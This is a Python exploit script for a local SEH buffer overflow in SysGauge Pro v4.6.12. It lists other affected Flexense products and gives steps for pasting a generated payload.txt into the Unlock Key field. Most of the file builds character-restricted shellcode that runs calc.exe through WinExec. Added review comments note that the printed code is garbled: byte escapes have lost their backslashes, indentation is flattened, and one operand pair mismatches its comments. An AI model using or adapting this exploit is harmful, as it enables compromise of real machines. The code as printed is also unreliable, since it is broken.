#!/usr/bin/python
##################################################################################################################
# Exploit Title : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH) #
##################################################################################################################
# Exploit Title : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sysgauge.com/ #
# Vulnerable Software : http://www.sysgauge.com/setups/sysgaugepro_setup_v4.6.12.exe #
# Tested on : Windows XP Professional - SP3 #
# Steps to reproduce : ~ Copy content of payload.txt #
# ~ Under Register type in "falafel" in Customer Name field #
# ~ Paste the content of payload.txt in Unlock Key field and click Register #
##################################################################################################################

import struct

# ***notes***
# ~ this particular function [Register] of the program only accepts characters [00-7f] excluding "\x00\x09\x0a\x0d"
# ~ found two application dlls [QtGui4.dll] & [libdgg.dll] that have plenty of [pop, pop, ret] with clean addresses
# ~ the following are Flexense products affected by the same vulnerability (note buffer size and offsets may vary)
##################################################################################################################
# ~ SysGauge Ultimate v4.6.12
# ~ Azure DEX Pro v2.2.16
# ~ Azure DEX Ultimate v2.2.16
# ~ DiskBoss Pro v9.1.16
# ~ DiskBoss Ultimate v9.1.16
# ~ SyncBreeze Pro v10.7.14
# ~ SyncBreeze Ultimate v10.7.14
# ~ DiskPulse Pro v10.7.14
# ~ DiskPulse Ultimate v10.7.14
# ~ DiskSavvy Pro v10.7.14
# ~ DiskSavvy Ultimate v10.7.14
# ~ DiskSorter Pro v10.7.14
# ~ DiskSorter Ultimate v10.7.14
# ~ DupScout Pro v10.7.14
# ~ DupScout Ultimate v10.7.14
# ~ VX Search Pro v10.7.14
# ~ VX Search Ultimate v10.7.14
##################################################################################################################

# overwrite SEH with clean address of [pop, pop, ret]
# Build the single attacker-controlled string that the header's steps paste
# into the Unlock Key field.  Each piece is appended in order, and the padding
# arithmetic at the very end assumes the exact byte count of every piece, so
# the lengths implied by the side comments are load-bearing.
#
# NOTE(review): every string literal in this listing reads as "x41" rather than
# a byte escape; the backslashes look like they were dropped when the page was
# extracted.  As printed, the script would write the ASCII text "x41x41..." and
# the len(buffer) reported below would not be the 50000 the padding math
# assumes.  Left as-is -- the side comments state the intended values.
#
# NOTE(review): Python 2 only: `print` statement syntax, and struct.pack()
# returns str there; on Python 3 it returns bytes and the `+=` onto a str
# would raise TypeError.  `buffer` also shadows the Python 2 builtin of that
# name -- harmless here, but a linter would flag it.

# overwrite SEH with clean address of [pop, pop, ret]
buffer = "x41" * 780 # junk to nSEH
buffer += "x74x06x42x42" # nSEH - jump if zero flag is set (always true)
buffer += struct.pack('<L', 0x10013d16) # SEH (pop esi # pop ecx # retn | [libdgg.dll])
buffer += "x43" * 28 # some more junk

# push calc.exe instructions [encoded] into the stack
# Disassembly:
# 0: 33 c0 xor eax,eax # zero out eax register
# 2: 50 push eax # push eax (null-byte) to terminate "calc.exe"
# 3: 68 2E 65 78 65 push ".exe" # push the ASCII string to the stack
# 8: 68 63 61 6C 63 push "calc" #
# d: 8b c4 mov eax,esp # put the pointer to the ASCII string in eax
# f: 6a 01 push 0x1 # push uCmdShow parameter to the stack
# 11: 50 push eax # push the pointer to lpCmdLine to the stack
# 12: bb 5d 2b 86 7c mov ebx,0x7c862b5d # move the pointer to WinExec() [located at 0x7c862b5d in kernel32.dll (via arwin.exe) on WinXP SP3] into ebx
# 17: ff d3 call ebx # call WinExec()
#
# NOTE(review): the WinExec() address above is a fixed kernel32.dll address
# taken from the author's XP SP3 machine, which is why the header lists only
# that OS as tested; on a system where kernel32 is loaded with ASLR the
# address is not stable, so this stage is tied to that one build.

# divide calc.exe instructions to 4-byte chunks and pad what's left with nops
# "\x33\xc0\x50\x68"
# "\x2e\x65\x78\x65"
# "\x68\x63\x61\x6C"
# "\x63\x8b\xc4\x6a"
# "\x01\x50\xbb\x5d"
# "\x2b\x86\x7c\xff"
# "\xd3\x90\x90\x90"

# starting from the bottom up in little endian order
# (each chunk below is written byte-reversed relative to the list above, so
# that once pushed it sits in memory in the listed order)
# first push "\x90\x90\x90\xd3"
##############################################################
# zero out eax
# (the two AND masks share no set bits, so eax ends up 0 while every byte
# used stays inside the 00-7f range the header says the field accepts)
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101

# move "\x90\x90\x90\xd3" into eax and push it to the stack
buffer += "x05x72x70x70x70" ### add eax,0x70707072
buffer += "x05x61x20x20x20" ### add eax,0x20202061
buffer += "x50" ### push eax
##############################################################

# second push "\xff\x7c\x86\x2b"
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101

# move "\xff\x7c\x86\x2b" into eax and push it to the stack
buffer += "x05x01x32x35x66" ### add eax,0x66353201
buffer += "x05x15x32x35x66" ### add eax,0x66353215
buffer += "x05x15x22x12x33" ### add eax,0x33122215
buffer += "x50" ### push eax
##############################################################

# third push "\x5d\xbb\x50\x01"
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101

# move "\x5d\xbb\x50\x01" into eax and push it to the stack
# (the two adds land one above the target, hence the dec eax before the push)
buffer += "x05x01x30x65x36" ### add eax,0x36653001
buffer += "x05x01x20x56x27" ### add eax,0x27562001
buffer += "x48" ### dec eax
buffer += "x50" ### push eax
##############################################################

# fourth push "\x6a\xc4\x8b\x63"
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101

# move "\x6a\xc4\x8b\x63" into eax and push it to the stack
# NOTE(review): the operand bytes on the next two lines do not match their
# side comments, unlike every other add/add pair in this file; which of the
# two is the intended value is not reconciled here.
buffer += "x05x32x46x70x35" ### add eax,0x35544632
buffer += "x05x31x43x70x35" ### add eax,0x35704531
buffer += "x50" ### push eax
##############################################################

# fifth push "\x6c\x61\x63\x68"
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101

# move "\x6c\x61\x63\x68" into eax and push it to the stack
buffer += "x05x34x32x31x36" ### add eax,0x36313234
buffer += "x05x34x31x30x36" ### add eax,0x36303134
buffer += "x50" ### push eax
##############################################################

# sixth push "\x65\x78\x65\x2e"
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101

# move "\x65\x78\x65\x2e" into eax and push it to the stack
buffer += "x05x17x33x34x33" ### add eax,0x33343317
buffer += "x05x17x32x44x32" ### add eax,0x32443217
buffer += "x50" ### push eax
##############################################################

# seventh push "\x68\x50\xc0\x33"
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101

# move "\x68\x50\xc0\x33" into eax and push it to the stack
buffer += "x05x22x60x30x34" ### add eax,0x34306022
buffer += "x05x11x60x20x34" ### add eax,0x34206011
buffer += "x50" ### push eax
##############################################################

# push 20 nops to the stack for padding
##############################################################
# zero out eax
buffer += "x25x10x10x10x10" ### and eax, 0x10101010
buffer += "x25x01x01x01x01" ### and eax, 0x01010101

# move "\x90\x90\x90\x90" into eax and push it to the stack (five times)
buffer += "x05x70x70x70x70" ### add eax,0x70707070
buffer += "x05x20x20x20x20" ### add eax,0x20202020
buffer += "x50" ### push eax
buffer += "x50" ### push eax
buffer += "x50" ### push eax
buffer += "x50" ### push eax
buffer += "x50" ### push eax
##############################################################

# push "jmp esp" address [encoded] to the stack
# 0x6709e053 : "\xff\xe4" | [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, (C:\Program Files\SysGauge Pro\bin\QtCore4.dll)
# 0: 25 10 10 10 10 and eax,0x10101010
# 5: 25 01 01 01 01 and eax,0x1010101
# a: 05 31 70 03 34 add eax,0x34037031
# f: 05 22 70 06 33 add eax,0x33067022
# 14: 50 push eax
#
# NOTE(review): the module properties listed above (no ASLR, no SafeSEH on the
# shipped Qt DLL) are what make a fixed address usable at all; from the
# defensive side, bounds-checking the Unlock Key input is the root-cause fix,
# and shipping those DLLs with those protections enabled removes the reuse of
# fixed addresses.

buffer += "x25x10x10x10x10x25x01x01x01x01x05x31x70x03x34x05x22x70x06x33x50"

# the program converts "\xff" to "c3" [retn instruction] thus popping previously pushed to the stack address "jmp esp" to eip ;)
buffer += "xff"
# the subtracted constants are the byte lengths of every piece appended above
# (780 junk, 4 nSEH, 4 SEH, 28 junk, the 21/26/22/21/21/21/21-byte encoded
# pushes, the 25-byte nop pushes, the 21-byte jmp-esp push and the 1-byte
# trailer), so the file is meant to total exactly 50000 bytes; the terms are
# not listed in build order, but the sum is the same
buffer += "C" * (50000-780-4-4-28-21-21-26-22-21-21-21-21-25-1) ### junk
# NOTE(review): the try/except bodies below carry no indentation as printed,
# so this listing is not valid Python as-is (extraction appears to have
# flattened it).
# NOTE(review): the bare `except:` hides the actual failure reason (e.g. a
# read-only directory) and also swallows KeyboardInterrupt; `except IOError as e`
# with the error shown, plus `with open(...)` so the handle is closed even if
# the write fails, is the usual shape.
try:
f=open("payload.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"